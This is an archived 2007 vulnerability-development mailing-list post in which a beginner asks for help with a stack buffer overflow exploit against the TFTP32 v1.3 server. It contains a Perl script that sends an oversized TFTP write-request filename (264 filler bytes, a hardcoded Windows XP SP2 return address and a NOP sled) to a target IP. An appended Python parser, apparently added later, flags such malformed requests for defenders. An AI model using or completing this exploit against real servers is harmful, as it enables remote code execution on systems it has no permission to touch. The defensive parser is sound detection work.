Vulnerability Development: Help needed in TFTP32v1.3 BO

Help needed in TFTP32v1.3 BO

From: wong yu liang <yuliang11_at_yahoo.com>
Date: Tue, 16 Oct 2007 22:53:53 -0700 (PDT)

hi all,
  i'm new to buffer overflows. i've gone thru some basic examples of buffer overflows; now i'm trying to write my own exploit based on this software. basically i found this perl script somewhere on the net. it takes 264 bytes to overflow, with 4 bytes extra for the EIP.
  i'm using call esp, #0x77e2d9d3 advapi32.dll winxp sp2 for the RET and i found that i'm still 4 bytes off when i dump the esp register in ollydbg. i've seen some examples on the net like "add esp 10, ret 4", but i'm not sure what it means.
hope someone can enlighten me on this. thanks

use IO::Socket;   # also exports inet_aton/sockaddr_in from Socket
$host = "10.10.10.2"; # Target IP here
$port = "69";         # Target Port Here. TFTP uses udp 69

# 0x77e2d9d3 advapi32.dll (address written over the saved EIP)
$shellcode = "\xd3\xd9\xe2\x77";

# NOP sled following the return address (136 bytes in total; no payload yet)
$shellcode .= "\x90" x 136;

$buf  = "\x00\x02";   # TFTP opcode 2 = WRQ; the rest is an oversized filename field
$buf .= "\x41" x 264; # filler up to the saved return address

$buf .= $shellcode;

# Print size of buffer
print "Length: ", length($buf), "\n";

# Try to create socket
$socket = IO::Socket::INET->new(Proto => "udp") or die "Cannot Create Socket: $@\n";
$ipaddr = inet_aton($host) || $host;
$portaddr = sockaddr_in($port, $ipaddr);

# Send our evil buffer
send($socket, $buf, 0, $portaddr) == length($buf) or die "Cannot Send Buffer: $!\n";
print "All Done\n";

Received on Oct 17 2007
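A defender's view of the same traffic, as an added example that is not part of the original post or of any TFTP32 code: a Python parser that checks a TFTP request datagram (UDP payload) against the RFC 1350 layout (opcode, filename, NUL, mode, NUL) and reports the anomalies a request like the one above would show, such as an unterminated filename several hundred bytes long. The 255-byte filename threshold is an assumed local policy, not an RFC limit, and the sample datagrams are constructed here.

```python
import struct

RRQ, WRQ = 1, 2                 # TFTP request opcodes (RFC 1350)
MAX_SANE_FILENAME = 255         # assumed local policy, not an RFC limit
VALID_MODES = (b"netascii", b"octet", b"mail")

def parse_tftp_request(datagram: bytes) -> dict:
    """Split a TFTP RRQ/WRQ UDP payload into opcode, filename, mode and a
    list of anomalies. A well-formed request is opcode + filename + NUL +
    mode + NUL, so both strings must be terminated and nothing may follow."""
    result = {"opcode": None, "filename": b"", "mode": b"", "anomalies": []}
    if len(datagram) < 2:
        result["anomalies"].append("truncated datagram")
        return result
    (result["opcode"],) = struct.unpack("!H", datagram[:2])
    if result["opcode"] not in (RRQ, WRQ):
        result["anomalies"].append("not a request")
        return result
    parts = datagram[2:].split(b"\x00")
    filename = result["filename"] = parts[0]
    mode = result["mode"] = parts[1] if len(parts) > 1 else b""
    if len(parts) == 1:
        result["anomalies"].append("filename not NUL-terminated")
    elif len(parts) == 2:
        result["anomalies"].append("mode not NUL-terminated")
    elif parts[2:] != [b""]:
        result["anomalies"].append("trailing data after mode")
    if len(filename) > MAX_SANE_FILENAME:
        result["anomalies"].append(f"filename too long ({len(filename)} bytes)")
    if any(b < 0x20 or b > 0x7E for b in filename):
        result["anomalies"].append("non-printable bytes in filename")
    if mode.lower() not in VALID_MODES:
        result["anomalies"].append("unknown transfer mode")
    return result

def is_suspicious(datagram: bytes) -> bool:
    """True when the datagram deviates from a well-formed TFTP request."""
    return bool(parse_tftp_request(datagram)["anomalies"])

# Constructed samples: a normal WRQ, and one laid out like the post's buffer
# (264 filler bytes, 4 placeholder bytes where the return address sits, 136 NOPs).
BENIGN_WRQ = b"\x00\x02" + b"config.bin\x00" + b"octet\x00"
OVERSIZED_WRQ = b"\x00\x02" + b"A" * 264 + b"BBBB" + b"\x90" * 136

if __name__ == "__main__":
    for name, pkt in (("benign", BENIGN_WRQ), ("oversized", OVERSIZED_WRQ)):
        print(name, parse_tftp_request(pkt)["anomalies"])
```

The same check can be run over the UDP payloads of port 69 traffic captured at a TFTP server to spot requests whose filename field never terminates.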
